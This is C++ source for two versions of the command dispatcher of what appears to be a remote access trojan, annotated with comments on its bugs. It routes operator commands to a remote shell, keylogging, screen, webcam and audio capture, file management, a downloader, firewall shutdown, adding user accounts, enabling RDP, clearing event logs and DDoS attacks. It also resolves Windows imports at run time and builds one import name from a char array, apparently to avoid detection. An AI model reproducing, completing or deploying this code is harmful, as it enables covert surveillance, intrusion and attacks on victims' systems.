// Add activation.
//
// Dispatches one received message. lpBuffer[0] selects the command; the bytes
// after it are that command's argument. nSize is the message length, but only
// the COMMAND_OPEN_3389 case uses it: every other case reads from lpBuffer + 1
// (or a fixed number of bytes, see COMMAND_DDOS_ATTACK) without checking that
// the message is that long, and the string arguments are assumed to be
// NUL-terminated by the sender.
//
// Several Win32 functions are resolved at run time with GetProcAddress instead
// of being called directly. None of the resulting pointers is checked for NULL
// before it is called, and the LoadLibrary handles obtained here are never
// released.
//
// m_hThread[m_nThreadCount++] is written without comparing m_nThreadCount to
// the table's capacity (the table is declared elsewhere) — TODO confirm it is
// large enough for the number of commands a client can send.
void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
{
    typedef LONG (WINAPI *InterlockedExchangeT) ( __inout LONG volatile *Target, __in LONG Value );
    InterlockedExchangeT pInterlockedExchange = (InterlockedExchangeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"InterlockedExchange");

    typedef VOID (WINAPI *SleepT) ( __in DWORD dwMilliseconds );
    SleepT pSleep = (SleepT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Sleep");

    typedef HANDLE (WINAPI *CreateThreadT)( __in_opt LPSECURITY_ATTRIBUTES lpThreadAttributes, __in SIZE_T dwStackSize, __in LPTHREAD_START_ROUTINE lpStartAddress, __in_opt LPVOID lpParameter, __in DWORD dwCreationFlags, __out_opt LPDWORD lpThreadId );
    CreateThreadT pCreateThread=(CreateThreadT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"CreateThread");

    typedef BOOL (WINAPI *CloseHandleT) ( __in HANDLE hObject );
    // The import name is assembled from a char array instead of being written
    // as a string literal.
    char DDZGlGm[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
    CloseHandleT pCloseHandle = (CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DDZGlGm);

    typedef BOOL (WINAPI *EnumWindowsT)( __in WNDENUMPROC lpEnumFunc, __in LPARAM lParam);
    EnumWindowsT pEnumWindows=(EnumWindowsT)GetProcAddress(LoadLibrary("USER32.dll"),"EnumWindows");

    switch (lpBuffer[0])
    {
    case COMMAND_ACTIVED:
        // No credential is checked here: receiving the command byte alone
        // marks the session as active.
        pInterlockedExchange((LONG *)&m_bIsActived, true);
        break;

    case COMMAND_LIST_DRIVE:    // file management
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_FileManager, (LPVOID)m_pClient->m_Socket, 0, NULL, false);
        break;

    case COMMAND_SCREEN_SPY:    // screen view
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ScreenManager, (LPVOID)m_pClient->m_Socket, 0, NULL, true);
        break;

    case COMMAND_WEBCAM:        // webcam
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_VideoManager, (LPVOID)m_pClient->m_Socket, 0, NULL);
        break;

    case COMMAND_AUDIO:         // audio capture
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_AudioManager, (LPVOID)m_pClient->m_Socket, 0, NULL);
        break;

    case COMMAND_SHELL:         // remote shell
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ShellManager, (LPVOID)m_pClient->m_Socket, 0, NULL, true);
        break;

    case COMMAND_KEYBOARD:      // keylogging
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_KeyboardManager, (LPVOID)m_pClient->m_Socket, 0, NULL);
        break;

    case COMMAND_SYSTEM:        // system management, including processes and windows
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SystemManager, (LPVOID)m_pClient->m_Socket, 0, NULL);
        break;

    case COMMAND_SERMANAGER:    // service management
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SerManager, (LPVOID)m_pClient->m_Socket, 0, NULL);
        break;

    case COMMAND_DDOS_ATTACK:
        {
            // sizeof(ATTACK) bytes are copied out of the message without
            // checking nSize, so a short message is read past its end.
            ATTACK m_Attack;
            memcpy(&m_Attack,lpBuffer + 1,sizeof(ATTACK));
            // The object lives only until the closing brace, so whatever it
            // does happens in its constructor/destructor (not visible here).
            DDOSManager m_DDOSManager(&m_Attack);
        }
        break;

    case COMMAND_DDOS_STOP:
        Stoping = FALSE;    // global flag, declared outside this function
        break;

    case COMMAND_REGEDIT:       // registry management
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_RegeditManager, (LPVOID)m_pClient->m_Socket, 0, NULL);
        break;

    case COMMAND_SYSINFO:
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SysInfoManager, (LPVOID)m_pClient->m_Socket, 0, NULL);
        break;

    // The next three cases (and COMMAND_CHANGE_PORT / COMMAND_DOWN_EXEC below)
    // hand the new thread a pointer into lpBuffer rather than a copy. lpBuffer
    // belongs to the caller, so the thread must read its argument before the
    // caller reuses the buffer; nothing here waits for that except the pSleep
    // in COMMAND_DOWN_EXEC.
    case COMMAND_NET_USER:      // add a user account
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)NETUSER, (LPVOID)(lpBuffer + 1), 0, NULL, true);
        break;

    case COMMAND_OPEN_PROXY:    // start proxy
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)OpenProxy, (LPVOID)(lpBuffer + 1), 0, NULL, true);
        break;

    case COMMAND_OPEN_3389:
        {
            // nSize is unsigned: a message shorter than 2 bytes makes
            // nSize - 2 wrap to a very large value.
            Open3389((LPCTSTR)(lpBuffer + 1), nSize -2);
        }
        break;

    case COMMAND_GUEST:         // enable the Guest account
        OpenGuest();
        break;

    case COMMAND_STOPFIRE:      // stop the firewall
        StopFire();
        break;

    case COMMAND_CHANGE_PORT:   // change terminal-services port
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)ChangePort, (LPVOID)(lpBuffer + 1), 0, NULL, true);
        break;

    case COMMAND_SENDMSG:
        {
            // The thread handle is closed at once, which does not stop the
            // thread; the thread is not added to m_hThread. pSleep(500) is
            // the only thing giving it time to read &lpBuffer[1].
            pCloseHandle(pCreateThread(NULL,NULL,Loop_MsgBox,&lpBuffer[1],NULL,NULL));
            pSleep(500);
        }
        break;

    case COMMAND_DOWN_EXEC:     // downloader
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager, (LPVOID)(lpBuffer + 1), 0, NULL, true);
        pSleep(100);    // gives the thread time to copy its argument out of lpBuffer
        break;

    case COMMAND_OPEN_URL_SHOW: // open URL in a visible window
        OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL);
        break;

    case COMMAND_OPEN_URL_HIDE: // open URL hidden
        OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE);
        break;

    case COMMAND_REMOVE:        // uninstall
        UnInstallService();
        break;

    case COMMAND_CLEAN_EVENT:   // clear event logs
        CleanEvent();
        break;

    case COMMAND_SESSION:       // session management
        CSystemManager::ShutdownWindows(lpBuffer[1]);
        break;

    case COMMAND_RENAME_REMARK: // change remark
        SetHostID((LPCTSTR)(lpBuffer + 1));
        break;

    case COMMAND_CHANGE_GROUP:  // change group
        SetInfo("Group", (LPCTSTR)(lpBuffer + 1), "BITS");
        break;

    case COMMAND_UPDATE_SERVER: // update server
        if (UpdateServer((char *)lpBuffer + 1))
            UnInstallService();
        break;

    case COMMAND_REPLAY_HEARTBEAT:  // heartbeat reply; nothing to do here
        break;

    case COMMAND_SORT_PROCESS:  // process filter
        // Answers with a single token byte; every exception is swallowed.
        try
        {
            if (isProcesin((LPTSTR)(lpBuffer + 1)))
            {
                BYTE bToken = TOKEN_INFO_YES;
                m_pClient->Send(&bToken, 1);
            }
            else
            {
                BYTE bToken = TOKEN_INFO_NO;
                m_pClient->Send(&bToken, 1);
            }
        }
        catch(...){}
        break;

    case COMMAND_SORT_WINDOW:   // window filter
        try
        {
            // Unbounded copy of the received string into temp_proc (a global
            // whose size is not visible here) — overflows on a long argument.
            strcpy(temp_proc,(LPTSTR)(lpBuffer + 1));
            // proc_tag is a global, presumably set by the EnumWindowsList
            // callback when a match is found; it is reset here after a hit.
            pEnumWindows(EnumWindowsList,0);
            if (proc_tag)
            {
                BYTE bToken = TOKEN_INFO_YES;
                m_pClient->Send(&bToken, 1);
                proc_tag = false;
            }
            else
            {
                BYTE bToken = TOKEN_INFO_NO;
                m_pClient->Send(&bToken, 1);
            }
        }
        catch(...){}
        break;
    }
}
// Add activation.
//
// Dispatches one received message. lpBuffer[0] selects the command; the bytes
// after it are that command's argument. nSize is logged and forwarded with the
// plugin request, but no case checks that the message is long enough for what
// it reads from lpBuffer + 1 (COMMAND_ACTIVED reads a fixed 200 bytes), and
// the string arguments are assumed to be NUL-terminated by the sender.
//
// m_hThread[m_nThreadCount++] is written without comparing m_nThreadCount to
// the table's capacity (the table is declared elsewhere) — TODO confirm it is
// large enough for the number of commands a client can send.
void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
{
    // dwTime is only referenced from the commented-out code in the
    // COMMAND_KEYBOARD case; it is currently unused.
    static int dwTime=0;
    pcmd_plugin cmd=NULL;

    switch (lpBuffer[0])
    {
    case COMMAND_ACTIVED:
        LOG((LEVEL_INFO,"COMMAND_ACTIVED:%d\n",nSize));
        {
            // Session activation. With an empty ConnPass every COMMAND_ACTIVED
            // activates; otherwise the password carried in the message must
            // match ConnPass (compared case-insensitively by lstrcmpi).
            if ( lstrlen(CKeyboardManager::ConnPass) == 0 )    // configured password empty: skip verification
            {
                if ( m_pClient->bSendLogin )    // guard against sending the login twice (seen during testing)
                {
                    sendLoginInfo_true( m_strServiceName, m_pClient, (GetTickCount() - CKeyboardManager::dwTickCount)/2 );
                    m_pClient->bSendLogin = FALSE;
                }
                InterlockedExchange((LONG *)&m_bIsActived, TRUE);
            }
            else    // password configured
            {
                // Copies a fixed 200 bytes regardless of nSize, so a shorter
                // message is read past its end. Pass is zero-filled and 256
                // bytes, so the copied value is always NUL-terminated.
                char Pass[256] = {0};
                memcpy( Pass, lpBuffer + 1, 200 );
                if ( lstrcmpi( CKeyboardManager::ConnPass, Pass ) == 0 )    // verify
                {
                    if ( m_pClient->bSendLogin )    // guard against sending the login twice (seen during testing)
                    {
                        sendLoginInfo_true( m_strServiceName, m_pClient, (GetTickCount() - CKeyboardManager::dwTickCount)/2 );
                        m_pClient->bSendLogin = FALSE;
                    }
                    InterlockedExchange((LONG *)&m_bIsActived, TRUE);    // match: activate
                }
                else
                {
                    InterlockedExchange((LONG *)&m_bIsActived, FALSE);    // mismatch: stay inactive
                }
            }
        }
        break;

    case COMMAND_LIST_DRIVE:    // file management
        LOG((LEVEL_INFO,"COMMAND_LIST_DRIVE:%d\n",nSize));
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_FileManager, (LPVOID)m_pClient->m_Socket, 0, NULL, FALSE);
        break;

    case COMMAND_SCREEN_SPY:    // screen view
        LOG((LEVEL_INFO,"COMMAND_SCREEN_SPY:%d\n",nSize));
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ScreenManager,(LPVOID)m_pClient->m_Socket, 0, NULL, TRUE);
        break;

    case COMMAND_WEBCAM:        // webcam
        LOG((LEVEL_INFO,"COMMAND_WEBCAM:%d\n",nSize));
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_VideoManager,(LPVOID)m_pClient->m_Socket, 0, NULL, FALSE);
        break;

    case COMMAND_AUDIO:         // audio
        LOG((LEVEL_INFO,"COMMAND_AUDIO:%d\n",nSize));
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_AudioManager,(LPVOID)m_pClient->m_Socket, 0, NULL, FALSE);
        break;

    case COMMAND_SHELL:         // remote shell
        LOG((LEVEL_INFO,"COMMAND_SHELL:%d\n",nSize));
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ShellManager, (LPVOID)m_pClient->m_Socket, 0, NULL, TRUE);
        break;

    case COMMAND_KEYBOARD:
        LOG((LEVEL_INFO,"COMMAND_KEYBOARD:%d\n",nSize));
        // NOTE(review): as this text is laid out, the Loop_KeyboardManager
        // call below sits inside the comment block as well, so this case
        // only logs — confirm against the original source layout.
        //2011/04/29 -yx
        //dwTime=0;
        // if (!dwTime)
        // {
        //     m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_HookKeyboard, (LPVOID)(lpBuffer+1), 0, NULL, TRUE);    //2011/04/29 yx
        //     dwTime++;
        // }
        //
        // m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_KeyboardManager,(LPVOID)m_pClient->m_Socket, 0, NULL, FALSE);
        break;

    case COMMAND_SYSTEM:
        LOG((LEVEL_INFO,"COMMAND_SYSTEM:%d\n",nSize));
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SystemManager,(LPVOID)m_pClient->m_Socket, 0, NULL, FALSE);
        break;

    case COMMAND_DOWN_EXEC:     // downloader
        LOG((LEVEL_INFO,"COMMAND_DOWN_EXEC:%d\n",nSize));
        // The thread receives a pointer into lpBuffer, not a copy; lpBuffer
        // belongs to the caller, and the SleepEx is the only thing giving the
        // thread time to read its argument. Same pattern in COMMAND_SERECT_CFG
        // and TOKEN_EVIDENCE_SREECN_ARG below.
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager,(LPVOID)(lpBuffer + 1), 0, NULL, TRUE);
        SleepEx(101,0);    // gives the thread time to copy its argument
        break;

    case COMMAND_OPEN_URL_SHOW: // open URL in a visible window
        LOG((LEVEL_INFO,"COMMAND_OPEN_URL_SHOW:%d\n",nSize));
        OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL);
        break;

    case COMMAND_OPEN_URL_HIDE: // open URL hidden
        LOG((LEVEL_INFO,"COMMAND_OPEN_URL_HIDE:%d\n",nSize));
        OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE);
        break;

    case COMMAND_REMOVE:        // uninstall
        {
            LOG((LEVEL_INFO,"COMMAND_REMOVE:%d\n",nSize));
            // liucw add 2013.07.25
            //
            // stop and remove plugins before uninstalling
            GLOBAL_PLUGSERVER->SetSocket(m_pClient);
            GLOBAL_PLUGSERVER->OnPluginRemove(0,0);
            // uninstall
            UnInstallService();
            break;
        }

    case COMMAND_CLEAN_EVENT:   // clear event logs
        LOG((LEVEL_INFO,"COMMAND_CLEAN_EVENT:%d\n",nSize));
        {
            CleanEvent();
        }
        break;

    case COMMAND_SESSION:
        LOG((LEVEL_INFO,"COMMAND_SESSION:%d\n",nSize));
        CSystemManager::ShutdownWindows(lpBuffer[1]);
        break;

    case COMMAND_RENAME_REMARK: // change remark
        LOG((LEVEL_INFO,"COMMAND_RENAME_REMARK:%d\n",nSize));
        SetHostID(m_strServiceName, (LPCTSTR)(lpBuffer + 1));
        break;

    case COMMAND_UPDATE_SERVER: // update server
        LOG((LEVEL_INFO,"COMMAND_UPDATE_SERVER:%d\n",nSize));
        if (UpdateServer((char *)lpBuffer + 1))
            UnInstallService();
        break;

    case COMMAND_REPLAY_HEARTBEAT:  // heartbeat reply: reset the base-class heartbeat timer
        ((CManager*)this)->m_pClient->dwHeartTime=0;
        break;

    case COMMAND_DDOS:          // disabled: only logs
        LOG((LEVEL_INFO,"COMMAND_DDOS:%d\n",nSize));
        // if ( !Gobal_DDOS_Running )
        // {
        //     m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)DDOS_Attacker, (LPVOID)lpBuffer, 0, NULL, TRUE);
        //     SleepEx(110,0);    // gives the thread time to copy its argument
        // }
        break;

    case COMMAND_DDOS_STOP:     // disabled: only logs
        LOG((LEVEL_INFO,"COMMAND_DDOS_STOP:%d\n",nSize));
        //DDOS_Stop();
        break;

    case COMMAND_HIT_HARD:      // disabled: only logs
        LOG((LEVEL_INFO,"COMMAND_HIT_HARD:%d\n",nSize));
        // KillMBR();
        break;

    case COMMAND_OPEN_3389:
        LOG((LEVEL_INFO,"COMMAND_OPEN_3389:%d\n",nSize));
        Open3389();
        break;

    case COMMAND_CHAJIAN:       // plugin download (thread creation disabled; only the sleep remains)
        LOG((LEVEL_INFO,"COMMAND_CHAJIAN:%d\n",nSize));
        //m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_CHAJIAN,(LPVOID)(lpBuffer + 1), 0, NULL, TRUE);
        SleepEx(110,0);    // gives the thread time to copy its argument
        break;

    case COMMAND_SERECT_CFG:    // configuration retrieval
        LOG((LEVEL_INFO,"COMMAND_SERECT_CFG:%d\n",nSize));
        // No SleepEx after this one, unlike the other lpBuffer + 1 threads.
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SecretCfg,(LPVOID)(lpBuffer + 1), 0, NULL, TRUE);
        break;

    case COMMAND_CHAJIAN_FORMIQU:
        // LOG((LEVEL_INFO,"COMMAND_CHAJIAN_FORMIQU:%d\n",nSize));
        // printf((char*)(lpBuffer + 1));
        m_pObjEvidence->PassBackFileList((char*)(lpBuffer + 1),0);
        // m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_CHAJIAN_MIQU,(LPVOID)(lpBuffer + 1), 0, NULL, TRUE);
        // SleepEx(110,0);    // gives the thread time to copy its argument
        break;

    case TOKEN_EVIDENCE_SREECN_ARG: // plugin download
        LOG((LEVEL_INFO,"TOKEN_EVIDENCE_SREECN_ARG:%d\n",nSize));
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_CHAJIAN_MIQU,(LPVOID)(lpBuffer + 1), 0, NULL, TRUE);
        SleepEx(110,0);    // gives the thread time to copy its argument
        break;

    case COMMAND_PLUGIN_REQUEST:    // 2.0 plugin download
        LOG((LEVEL_INFO,"收到COMMAND_PLUGIN_REQUEST,buff大小:%d(%x) .\n",nSize,nSize));
        // Plain new throws on failure rather than returning NULL, so this
        // check only helps if the project replaces operator new or builds
        // without exceptions — TODO confirm.
        cmd=new cmd_plugin;
        if (!cmd)
        {
            break;
        }
        cmd->Clientsocket=m_pClient;
        cmd->nSize=nSize-1;
        // Stores a pointer into the caller's lpBuffer, not a copy; the new
        // thread must consume it before the buffer is reused, and nothing
        // here waits for that. Ownership of cmd is presumably transferred to
        // Loop_Plugin_Request, which would have to delete it — verify.
        cmd->lpBuffer=lpBuffer+1;
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_Plugin_Request,(LPVOID)(cmd), 0, NULL, TRUE);
        break;
        // Previous synchronous implementation, kept for reference:
        // {
        //     ++lpBuffer;
        //     --nSize;
        //
        //     // should be set every time so that it is not lost
        //     GLOBAL_PLUGSERVER->SetSocket(m_pClient);
        //     int ret = GLOBAL_PLUGSERVER->OnPluginRequest(lpBuffer,nSize);
        //     if( ret != 0 )
        //     {
        //         LOG((LEVEL_WARNNING,"处理插件下载命令错,ret=%d",ret));
        //     }
        //     GLOBAL_PLUGSERVER->ProcessConfig();
        //
        //     break;
        //
        // }

    case COMMAND_ONLINE_ERROR:
        {
            LOG((LEVEL_INFO,"上线时发送错误.\n"));
            m_pClient->Disconnect();
            break;
        }

    default:
        // Unknown command bytes are logged and otherwise ignored.
        LOG((LEVEL_ERROR,"UNKNOWN COMMAND:%d(%x)\n",lpBuffer[0],lpBuffer[0]));
        break;
    }
}